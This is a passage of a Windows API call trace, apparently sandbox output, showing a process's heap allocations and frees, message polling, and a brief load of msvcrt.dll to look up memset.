wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.453] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0186.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.454] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.455] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0186.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0186.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0186.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.456] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0186.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.458] FreeLibrary (hLibModule=0x75c90000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.459] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.459] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0186.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0186.461] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0186.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0186.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0186.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd360 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0186.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0186.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0186.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0186.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0186.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0186.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0186.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.464] HeapFree 